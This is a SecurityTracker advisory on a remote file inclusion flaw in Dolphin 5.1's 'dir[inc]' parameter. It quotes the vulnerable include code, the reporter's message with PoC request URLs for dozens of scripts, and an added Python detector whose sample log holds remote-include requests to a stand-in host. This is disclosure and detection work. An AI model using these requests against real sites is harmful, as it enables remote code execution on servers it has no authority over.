SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  Dolphin
Vendors:  BoonEx
Dolphin Include File Bug in 'dir[inc]' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016692
SecurityTracker URL:  http://securitytracker.com/id?1016692
CVE Reference:  CVE-2006-4189
Updated:  Jun 8 2008
Original Entry Date:  Aug 14 2006
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 5.1
Description:  Charles Nelwan (Cmaster4) reported a vulnerability in Dolphin. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'dir[inc]' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A large number of scripts in the package are affected.

Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.boonex.com/products/dolphin/
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Charles Nelwan" <cnelwan@gmail.com>
Message History:   None.
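
A log-review check for the request pattern described above, added here as an example (it is not part of the SecurityTracker entry or the reporter's message): it flags access-log requests that set `dir[inc]`, undoing nested percent-encoding first. The log lines, the example.invalid host, the function names and the verdict labels are constructed for illustration, and it assumes the application never expects `dir[inc]` from a client.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# dir[inc], with quoted variants matched too so sloppy probes are still caught.
PARAM_RE = re.compile(r'''^dir\[\s*['"]?inc['"]?\s*\]$''', re.I)
# Prefixes that make a PHP include read from a stream wrapper, not a local directory.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?|php|data|expect|zip|phar):', re.I)

SAMPLE_LOG = [  # constructed entries, not real traffic
    '192.0.2.10 - - [14/Aug/2006:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Aug/2006:10:00:05 +0000] "GET /faq.php?dir[inc]=http://example.invalid/x.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [14/Aug/2006:10:00:09 +0000] "GET /cc.php?dir%5Binc%5D=%2568ttp%3A%2F%2Fexample.invalid%2Fx HTTP/1.0" 200 298',
    '203.0.113.4 - - [14/Aug/2006:10:01:00 +0000] "GET /browse.php?dir[inc]=../../tmp/ HTTP/1.1" 200 77',
]

def fully_decode(text, rounds=3):
    """Undo nested percent-encoding (e.g. %2568 -> %68 -> h), at most `rounds` passes."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(log_line):
    """Return (script, verdict, value) when the request sets dir[inc], else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if not PARAM_RE.match(fully_decode(key)):
            continue
        value = fully_decode(value)
        if REMOTE_RE.match(value):
            verdict = "remote-include"
        elif ".." in value or value.startswith("/"):
            verdict = "local-path"
        else:
            verdict = "param-set"  # assumption: clients never legitimately send this
        return (url.path, verdict, value)
    return None

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]
```

Access logs record only the query string, so a value sent in a request body would not appear in this check.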


 Source Message Contents

Date:  Sun, 13 Aug 2006 14:56:24 -0600
From:  "Charles Nelwan" <cnelwan@gmail.com>
Subject:  Dolphin Web Community Software v5.1 <== dir[inc] Remote File Include Vulnerabilities

 
-------------------------------------------------------------------------------------------------
Dolphin Web Community Software v5.1 Remote File Include Vulnerabilities
-------------------------------------------------------------------------------------------------
Author        : Charles Nelwan a.k.a Cmaster4
Community : #batamhacker irc.dal.net
Date           : 2006/08/14
HomePage  : http://www.batamhacker.info
Contact      : bugtraq_indo[at]yahoo[dot]com
-------------------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Dolphin Web Community Software
Vendor      : http://www.boonex.com
Class       : Remote File Inclusion
Risk        : High
Summary     : 2006 BoonEx Group
 
------------------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
in
index.php, aemodule.php, browse.php, cc.php, click.php, faq.php, gallery.php , im.php 
inbox.php, join_form.php, logout.php, messages_inbox.php, news_view.php, poll.php, 
profile.php, profile_edit.php, profile_video, sdating.php, service.php, stories.php
   tellfriend.php, video_pop.php, about_us.php, affiliates.php, cart.php, change_status.php
   compose.php, forgot.php, getmem.php, links.php, member.php, messages_outbox.php, outbox.php
   polls.php, profile_activate.php, profile_photos.php, rate.php, search.php , shoutbox.php
   story.php, terms_of_use.php, vkiss.php, activation_email.php, blog.php, cart_pop.php,
   checkout.php, contact.php, explanation.php, freemail.php, guestbook.php, imctrl.php
   join_aff.php, list_pop.php, membership.php, news.php, photos_gallery.php, privacy.php
   profile_customize.php, profile_sound.php, result.php, search_result.php, sound_pop.php
   story_view.php, unregister.php
 
and I found all of the directory/script have the bugs/vulnerability
 
Vulnerability Script
----------------------------------------index.php------------------------------------------------
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}design.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
require_once( "{$dir['inc']}admin.inc.php" );
require_once( "{$dir['inc']}profiles.inc.php" );
require_once( "{$dir['inc']}prof.inc.php" );
require_once( "{$dir['inc']}members.inc.php" );
require_once( "{$dir['inc']}quotes.inc.php" );
require_once( "{$dir['inc']}utils.inc.php" );
require_once( "{$dir['inc']}membership_levels.inc.php" );
----------------------------------------aemodule.php---------------------------------------------
require_once("./inc/header.inc.php");
require_once("{$dir['inc']}db.inc.php");
require_once("{$dir['inc']}design.inc.php");
require_once("{$dir['inc']}admin.inc.php");
require_once("{$dir['inc']}modules.inc.php");
require_once("{$dir['inc']}membership_levels.inc.php");
require_once("{$dir['inc']}utils.inc.php");
--------------------------------------browse.php------------------------------------------------
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
require_once( "{$dir['inc']}design.inc.php" );
require_once( "{$dir['inc']}profiles.inc.php" );
----------------------------------------cc.php--------------------------------------------------
require_once("inc/header.inc.php");
require_once("{$dir['inc']}db.inc.php");
require_once("{$dir['inc']}design.inc.php");
require_once("{$dir['inc']}profiles.inc.php");
require_once("{$dir['inc']}utils.inc.php");
---------------------------------------click.php-------------------------------------------------
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
-------------------------------------------faq.php------------------------------------------------
require_once( "./inc/header.inc.php" );
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]design.inc.php" );
require_once( "$dir[inc]profiles.inc.php" );
-------------------------------------------gallery.php--------------------------------------------
require_once("inc/header.inc.php");
require_once("{$dir['inc']}db.inc.php");
require_once("{$dir['inc']}admin.inc.php");
require_once("{$dir['inc']}design.inc.php");
require_once("{$dir['inc']}modules.inc.php");
require_once("{$dir['inc']}utils.inc.php");
require_once("{$dir['inc']}images.inc.php");
-------------------------------------------im.php----------------------------------------------------
require_once( "./inc/header.inc.php" );
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]design.inc.php" );
require_once( "$dir[inc]profiles.inc.php" );
-------------------------------------------inbox.php-------------------------------------------------
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
require_once( "{$dir['inc']}design.inc.php" );
require_once( "{$dir['inc']}profiles.inc.php" );
require_once( "{$dir['inc']}utils.inc.php" );
-------------------------------------------join_form.php--------------------------------------------
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
require_once( "{$dir['inc']}design.inc.php" );
require_once( "{$dir['inc']}profiles.inc.php" );
require_once( "{$dir['inc']}profile_disp.inc.php" );
require_once( "{$dir['inc']}utils.inc.php" );
-------------------------------------------logout.php--------------------------------------------
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
require_once( "{$dir['inc']}design.inc.php" );
-------------------------------------------messages_inbox.php--------------------------------------------
require_once( "inc/header.inc.php" );
require_once( "{$dir['inc']}db.inc.php" );
require_once( "{$dir['inc']}design.inc.php" );
require_once( "{$dir['inc']}profiles.inc.php" );
require_once( "{$dir['inc']}utils.inc.php" );

And more vulnerabilities; I'm sorry I cannot show all of the scripts because there are too many bugs
------------------------------------------------------------------------------------------------
PoC:
~~~
http://www.target.com/index.php?dir[inc]=
http://www.target.com/event.php?dir[inc]=[Evil Script]
http://www.target.com/aemodule.php?dir[inc]=[Evil Script]
http://www.target.com/browse.php?dir[inc]=[Evil Script]
http://www.target.com/cc.php?dir[inc]=[Evil Script]
http://www.target.com/click.php?dir[inc]=[Evil Script]
http://www.target.com/faq.php?dir[inc]=[Evil Script]
http://www.target.com/gallery.php?dir[inc]=[Evil Script]
http://www.target.com/im.php?dir[inc]=[Evil Script]
http://www.target.com/inbox.php?dir[inc]=[Evil Script]
http://www.target.com/join_form.php?dir[inc]=[Evil Script]
http://www.target.com/logout.php?dir[inc]=[Evil Script]
http://www.target.com/messages_inbox.php?dir[inc]=[Evil Script]
http://www.target.com/news_view.php?dir[inc]=[Evil Script]
http://www.target.com/poll.php?dir[inc]=[Evil Script]
http://www.target.com/profile.php?dir[inc]=[Evil Script]
http://www.target.com/profile_edit.php?dir[inc]=[Evil Script]
http://www.target.com/profile_video?dir[inc]=[Evil Script]
http://www.target.com/sdating.php?dir[inc]=[Evil Script]
http://www.target.com/service.php?dir[inc]=[Evil Script]
http://www.target.com/stories.php?dir[inc]=[Evil Script]
http://www.target.com/tellfriend.php?dir[inc]=[Evil Script]
http://www.target.com/video_pop.php?dir[inc]=[Evil Script]
http://www.target.com/about_us.php?dir[inc]=[Evil Script]
http://www.target.com/affiliates.php?dir[inc]=[Evil Script]
http://www.target.com/cart.php?dir[inc]=[Evil Script]
http://www.target.com/change_status.php?dir[inc]=[Evil Script]
http://www.target.com/compose.php?dir[inc]=[Evil Script]
http://www.target.com/forgot.php?dir[inc]=[Evil Script]
http://www.target.com/getmem.php?dir[inc]=[Evil Script]
http://www.target.com/member.php?dir[inc]=[Evil Script]
http://www.target.com/messages_outbox.php?dir[inc]=[Evil Script]
http://www.target.com/outbox.php?dir[inc]=[Evil Script]
http://www.target.com/polls.php?dir[inc]=[Evil Script]
http://www.target.com/profile_activate.php?dir[inc]=[Evil Script]
http://www.target.com/profile_photos.php?dir[inc]=[Evil Script]
http://www.target.com/rate.php?dir[inc]=[Evil Script]
http://www.target.com/search.ph?dir[inc]=[Evil Script]
http://www.target.com/shoutbox.php?dir[inc]=[Evil Script]
http://www.target.com/story.php?dir[inc]=[Evil Script]
http://www.target.com/terms_of_use.php?dir[inc]=[Evil Script]
http://www.target.com/vkiss.php?dir[inc]=[Evil Script]
http://www.target.com/activation_email.php?dir[inc]=[Evil Script]
http://www.target.com/blog.php?dir[inc]=[Evil Script]
http://www.target.com/cart_pop.php?dir[inc]=[Evil Script]
http://www.target.com/checkout.php?dir[inc]=[Evil Script]
http://www.target.com/contact.php?dir[inc]=[Evil Script]
http://www.target.com/explanation.php?dir[inc]=[Evil Script]
http://www.target.com/freemail.ph?dir[inc]=[Evil Script]
http://www.target.com/guestbook.php?dir[inc]=[Evil Script]
http://www.target.com/imctrl.php?dir[inc]=[Evil Script]
http://www.target.com/join_aff.php?dir[inc]=[Evil Script]
http://www.target.com/list_pop.php?dir[inc]=[Evil Script]
http://www.target.com/membership.php?dir[inc]=[Evil Script]
http://www.target.com/news.php?dir[inc]=[Evil Script]
http://www.target.com/photos_gallery.php?dir[inc]=[Evil Script]
http://www.target.com/privacy.php?dir[inc]=[Evil Script]
http://www.target.com/profile_customize.php?dir[inc]=[Evil Script]
http://www.target.com/profile_sound.php?dir[inc]=[Evil Script]
http://www.target.com/result.php?dir[inc]=[Evil Script]
http://www.target.com/search_result.php?dir[inc]=[Evil Script]
http://www.target.com/sound_pop.php?dir[inc]=[Evil Script]
http://www.target.com/story_view.php?dir[inc]=[Evil Script]
http://www.target.com/unregister.php?dir[inc]=[Evil Script]

Solution:
~~~~~~~~
Sanitize Variable $$dir['inc'] in
index.php, aemodule.php, browse.php, cc.php, click.php, faq.php, gallery.php, im.php
inbox.php, join_form.php, logout.php, messages_inbox.php, news_view.php, poll.php,
profile.php, profile_edit.php, profile_video, sdating.php, service.php, stories.php
tellfriend.php, video_pop.php, about_us.php, affiliates.php, cart.php, change_status.php
compose.php, forgot.php, getmem.php, links.php, member.php, messages_outbox.php, outbox.php
polls.php, profile_activate.php, profile_photos.php, rate.php, search.php, shoutbox.php
story.php, terms_of_use.php, vkiss.php, activation_email.php, blog.php, cart_pop.php,
checkout.php, contact.php, explanation.php, freemail.php, guestbook.php, imctrl.php
join_aff.php, list_pop.ph, pmembership.php, news.php, photos_gallery.php, privacy.php
profile_customize.php, profile_sound.php, result.php, search_result.php, sound_pop.php
story_view.php, unregister.php
----------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz To My BATAMHACKER CREW ON IRC.DAL.NET h4ntu, havicaz, baylaw
~ To All Indonesian Underground Hacker


Copyright 2007, SecurityGlobal.net LLC